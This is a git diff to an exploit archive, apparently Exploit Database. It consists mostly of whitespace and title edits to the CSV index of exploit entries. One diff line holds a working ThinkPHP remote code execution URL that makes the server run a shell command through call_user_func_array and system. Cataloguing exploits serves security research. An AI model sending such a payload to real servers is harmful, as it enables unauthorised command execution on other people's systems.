diff --git a/exploits/php/webapps/45978.txt b/exploits/php/webapps/45978.txt index 00b6552e3..55dc0bcbb 100644 --- a/exploits/php/webapps/45978.txt +++ b/exploits/php/webapps/45978.txt @@ -8,4 +8,4 @@ # Exploit -http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' \ No newline at end of file +http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' \ No newline at end of file diff --git a/exploits/windows/local/951.py b/exploits/windows/local/951.py index 6ebf55f2c..8b5b6693d 100755 --- a/exploits/windows/local/951.py +++ b/exploits/windows/local/951.py @@ -7,8 +7,8 @@ # # # Based on the exploit written by S.Pearson and # # Python version by coded by Tal zeltzer # -# # -# XP/sp2 fixed version by Jean Luc # +# # +# XP/sp2 fixed version by Jean Luc # # # ################################################################## diff --git a/files_exploits.csv b/files_exploits.csv index 3f87f9d9d..0131c8504 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3048,7 +3048,7 @@ id,file,description,date,author,type,platform,port 23442,exploits/osx/dos/23442.txt,"Apple Mac OSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,dos,osx, 23444,exploits/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,dos,multiple, 23460,exploits/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",dos,php, -23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow",2003-12-23,storm,dos,windows, +23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - 'PASS' Remote Buffer Overflow",2003-12-23,storm,dos,windows, 23469,exploits/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,dos,windows, 23480,exploits/windows/dos/23480.txt,"Surfboard HTTPd 1.1.9 - Remote Buffer Overflow (PoC)",2003-12-26,"decka trash",dos,windows, 23496,exploits/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",dos,windows, @@ -3703,7 +3703,7 @@ id,file,description,date,author,type,platform,port 29287,exploits/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",dos,windows, 29295,exploits/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,dos,windows, 29296,exploits/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",dos,linux, -29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware, +29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware, 29305,exploits/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple, 29307,exploits/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",dos,windows, 29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple, @@ -4062,7 +4062,7 @@ id,file,description,date,author,type,platform,port 32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",dos,multiple, 32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Buffer Overflow",2008-08-07,"Shaun Colley",dos,multiple, 32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,dos,multiple, -32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service",2008-08-08,Antunes,dos,multiple, +32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - 'LIST' Remote Denial of Service",2008-08-08,Antunes,dos,multiple, 32208,exploits/multiple/dos/32208.txt,"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities",2014-03-12,"Core Security",dos,multiple, 32222,exploits/multiple/dos/32222.rb,"Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service",2008-08-11,"Keita Yamaguchi",dos,multiple, 32229,exploits/windows/dos/32229.txt,"hMAilServer 4.4.1 - IMAP Command Remote Denial of Service",2008-08-12,Antunes,dos,windows, @@ -4348,7 +4348,7 @@ id,file,description,date,author,type,platform,port 34375,exploits/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",dos,linux, 34394,exploits/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC)",2010-08-03,"Rodrigo Escobar",dos,hardware, 34395,exploits/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",dos,windows, -34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow",2010-07-22,demonalex,dos,windows, +34403,exploits/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - 'USER' Remote Buffer Overflow",2010-07-22,demonalex,dos,windows, 34404,exploits/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,dos,windows, 34427,exploits/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",dos,linux, 34428,exploits/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - '.m3u' Buffer Overflow",2010-08-09,"Abhishek Lyall",dos,windows, @@ -5496,7 +5496,7 @@ id,file,description,date,author,type,platform,port 44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos, 44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (PoC)",2018-02-14,r4xis,dos,windows, 44046,exploits/windows/dos/44046.md,"K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read",2017-10-23,SecuriTeam,dos,windows, -44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux, +44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free (2)",2017-10-17,SecuriTeam,dos,linux, 44057,exploits/php/dos/44057.md,"Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service",2017-08-30,SecuriTeam,dos,php, 44075,exploits/windows/dos/44075.txt,"Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)",2018-02-15,"Google Security Research",dos,windows, 44076,exploits/windows/dos/44076.js,"Microsoft Edge Chakra JIT - Memory Corruption",2018-02-15,"Google Security Research",dos,windows, @@ -5808,7 +5808,7 @@ id,file,description,date,author,type,platform,port 42999,exploits/windows/dos/42999.js,"Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service)",2017-10-17,"Google Security Research",dos,windows, 43000,exploits/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",dos,windows, 43001,exploits/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",dos,windows, -43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux, +43010,exploits/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free (1)",2017-10-17,SecuriTeam,dos,linux, 43107,exploits/ios/dos/43107.py,"WhatsApp 2.17.52 - Memory Corruption",2017-11-01,"Juan Sacco",dos,ios, 43014,exploits/linux/dos/43014.txt,"Xen - Pagetable De-typing Unbounded Recursion",2017-10-18,"Google Security Research",dos,linux, 43020,exploits/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",dos,multiple, @@ -5999,7 +5999,7 @@ id,file,description,date,author,type,platform,port 44859,exploits/multiple/dos/44859.html,"WebKit - WebAssembly Compilation Info Leak",2018-06-08,"Google Security Research",dos,multiple, 44860,exploits/multiple/dos/44860.js,"Google Chrome - Integer Overflow when Processing WebAssembly Locals",2018-06-08,"Google Security Research",dos,multiple, 44861,exploits/multiple/dos/44861.html,"WebKit - Use-After-Free when Resuming Generator",2018-06-08,"Google Security Research",dos,multiple, -44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple, +44862,exploits/multiple/dos/44862.txt,"WebRTC - VP9 Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple, 44863,exploits/multiple/dos/44863.txt,"WebRTC - VP9 Missing Frame Processing Out-of-Bounds Memory Access",2018-06-08,"Google Security Research",dos,multiple, 44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux, 44908,exploits/linux/dos/44908.txt,"Redis 5.0 - Denial of Service",2018-06-20,"Fakhri Zulkifli",dos,linux, @@ -6114,7 +6114,7 @@ id,file,description,date,author,type,platform,port 45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64, 45419,exploits/windows_x86/dos/45419.py,"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)",2018-09-17,"Gionathan Reale",dos,windows_x86, 45420,exploits/windows_x86-64/dos/45420.py,"Notebook Pro 2.0 - Denial Of Service (PoC)",2018-09-17,"Ali Alipour",dos,windows_x86-64, -45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64, +45421,exploits/windows_x86-64/dos/45421.py,"Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)",2018-09-17,"Jose Eduardo Castro",dos,windows_x86-64, 45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,21 45431,exploits/windows/dos/45431.js,"Microsoft Edge Chakra - 'PathTypeHandlerBase::SetAttributesHelper' Type Confusion",2018-09-18,"Google Security Research",dos,windows, 45432,exploits/windows/dos/45432.js,"Microsoft Edge Chakra JIT - 'localeCompare' Type Confusion",2018-09-18,"Google Security Research",dos,windows, @@ -9062,7 +9062,7 @@ id,file,description,date,author,type,platform,port 32693,exploits/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass",2008-12-31,Mr.SaFa7,local,php, 32700,exploits/linux/local/32700.rb,"ibstat $PATH - Local Privilege Escalation (Metasploit)",2014-04-04,Metasploit,local,linux, 32737,exploits/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",local,windows, -32751,exploits/linux_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",local,linux_x86-64, +32751,exploits/linux_x86-64/local/32751.c,"Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation",2009-01-23,"Chris Evans",local,linux_x86-64, 32752,exploits/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,local,windows, 32771,exploits/windows/local/32771.txt,"Kaspersky (Multiple Products) - 'klim5.sys' Local Privilege Escalation",2009-02-02,"Ruben Santamarta",local,windows, 32778,exploits/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,local,windows, @@ -9268,7 +9268,7 @@ id,file,description,date,author,type,platform,port 37197,exploits/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Local Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",local,windows, 37167,exploits/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions",2015-06-01,"Hacker Fantastic",local,linux, 37168,exploits/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",local,linux, -37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Local Kernel",2015-06-02,"Hacker Fantastic",local,linux, +37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Kernel Local Privilege Escalation",2015-06-02,"Hacker Fantastic",local,linux, 37211,exploits/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow",2015-06-05,metacom,local,windows, 37212,exploits/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,local,windows, 37265,exploits/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation",2015-06-11,"Andrew Widdersheim",local,linux, @@ -9852,7 +9852,7 @@ id,file,description,date,author,type,platform,port 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows, -43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86, +43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86, 43201,exploits/macos/local/43201.rb,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos, 43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, @@ -10008,7 +10008,7 @@ id,file,description,date,author,type,platform,port 44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware, 44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows, 45009,exploits/linux/local/45009.txt,"Awk to Perl 1.007-5 - Buffer Overflow (PoC)",2018-07-11,"Todor Donev",local,linux, -45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux, +45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux, 45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows, 45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows, 45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware, @@ -10035,7 +10035,7 @@ id,file,description,date,author,type,platform,port 45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64, 45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64, 45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows, -45175,exploits/linux/local/45175.c,"Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux, +45175,exploits/linux/local/45175.c,"Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux, 45176,exploits/windows_x86-64/local/45176.py,"iSmartViewPro 1.5 - 'Password' Buffer Overflow",2018-08-10,"Javier Enrique Rodriguez Gutierrez",local,windows_x86-64, 45181,exploits/windows_x86/local/45181.py,"Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow",2018-08-13,"Shubham Singh",local,windows_x86, 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux, @@ -10336,7 +10336,7 @@ id,file,description,date,author,type,platform,port 475,exploits/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator (MS04-028)",2004-09-23,"Elia Florio",remote,windows, 478,exploits/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode (MS04-028)",2004-09-25,ATmaCA,remote,windows, 480,exploits/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)",2004-09-25,"John Bissell",remote,windows, -556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,remote,windows, +556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ Bind/Reverse/Admin/File Download",2004-09-27,M4Z3R,remote,windows, 566,exploits/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,remote,windows,80 568,exploits/windows/remote/568.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (1)",2004-10-06,Delikon,remote,windows,8000 572,exploits/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer",2004-10-11,"Paul Szabo",remote,windows, @@ -11814,7 +11814,7 @@ id,file,description,date,author,type,platform,port 15963,exploits/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",remote,windows, 15984,exploits/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (MS11-002)",2011-01-12,"Peter Vreugdenhil",remote,windows, 16014,exploits/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,remote,windows, -16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows, +16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows, 16041,exploits/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,remote,multiple, 16052,exploits/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",remote,windows, 16053,exploits/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",remote,windows, @@ -12213,7 +12213,7 @@ id,file,description,date,author,type,platform,port 16731,exploits/windows_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows_x86, 16732,exploits/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,remote,windows, 16733,exploits/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows,21 -16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows, +16734,exploits/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,remote,windows, 16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows, 16736,exploits/windows/remote/16736.rb,"FTPShell 5.1 - Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows, 16737,exploits/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - 'CWD' Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,remote,windows, @@ -12483,7 +12483,7 @@ id,file,description,date,author,type,platform,port 17575,exploits/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,remote,windows, 17578,exploits/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,remote,windows, 17581,exploits/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,remote,windows, -17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows, +17588,exploits/windows/remote/17588.rb,"Actfax FTP Server 4.27 - 'USER' Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,remote,windows, 17612,exploits/windows/remote/17612.rb,"Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)",2011-08-05,Rh0,remote,windows, 17614,exploits/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",remote,hp-ux, 17619,exploits/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",remote,windows, @@ -14446,7 +14446,7 @@ id,file,description,date,author,type,platform,port 24547,exploits/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, 24548,exploits/php/remote/24548.rb,"Glossword 1.8.8 < 1.8.12 - Arbitrary File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, 24549,exploits/php/remote/24549.rb,"PolarPearCMS - Arbitrary '.PHP' File Upload (Metasploit)",2013-02-26,Metasploit,remote,php, -24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow",2013-03-01,superkojiman,remote,windows, +24557,exploits/windows/remote/24557.py,"Sami FTP Server 2.0.1 - 'LIST' Buffer Overflow",2013-03-01,superkojiman,remote,windows, 24567,exploits/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",remote,multiple, 24568,exploits/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows, 24571,exploits/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,remote,windows, @@ -14504,7 +14504,7 @@ id,file,description,date,author,type,platform,port 24856,exploits/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",remote,linux, 24857,exploits/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",remote,linux, 24874,exploits/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,remote,multiple, -24875,exploits/windows/remote/24875.rb,"Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows, +24875,exploits/windows/remote/24875.rb,"Sami FTP Server - 'LIST' Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows, 24876,exploits/windows/remote/24876.rb,"Cool PDF Image Stream - Remote Buffer Overflow (Metasploit)",2013-03-22,Metasploit,remote,windows, 24886,exploits/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,remote,windows, 24887,exploits/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,remote,windows, @@ -16963,8 +16963,8 @@ id,file,description,date,author,type,platform,port 45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86, 45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php, 45233,exploits/linux/remote/45233.py,"OpenSSH 2.3 < 7.7 - Username Enumeration",2018-08-21,"Justin Gardner",remote,linux, -45260,exploits/linux/remote/45260.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)",2018-08-26,"Mazin Ahmed",remote,linux,8080 -45262,exploits/multiple/remote/45262.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)",2018-08-25,hook-s3c,remote,multiple,8080 +45260,exploits/linux/remote/45260.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)",2018-08-26,"Mazin Ahmed",remote,linux,8080 +45262,exploits/multiple/remote/45262.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)",2018-08-25,hook-s3c,remote,multiple,8080 45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux, 45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple, 45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix, @@ -20242,7 +20242,7 @@ id,file,description,date,author,type,platform,port 5895,exploits/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,webapps,php, 5896,exploits/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusions",2008-06-22,"CWH Underground",webapps,php, 5897,exploits/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php, -5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell Blind SQL Injection",2008-06-22,"Guido Landi",webapps,php, +5898,exploits/php/webapps/5898.pl,"IGSuite 3.2.4 - Reverse Shell / Blind SQL Injection",2008-06-22,"Guido Landi",webapps,php, 5899,exploits/php/webapps/5899.txt,"PageSquid CMS 0.3 Beta - 'index.php' SQL Injection",2008-06-22,"CWH Underground",webapps,php, 5900,exploits/php/webapps/5900.txt,"RSS-aggregator - 'path' Remote File Inclusion",2008-06-22,"Ghost Hacker",webapps,php, 5901,exploits/php/webapps/5901.txt,"MiGCMS 2.0.5 - Multiple Remote File Inclusions",2008-06-22,CraCkEr,webapps,php, @@ -39922,7 +39922,7 @@ id,file,description,date,author,type,platform,port 44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,80 44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp, -44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php, +44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php, 44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware, 44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php, 44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php, @@ -40010,7 +40010,7 @@ id,file,description,date,author,type,platform,port 44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80 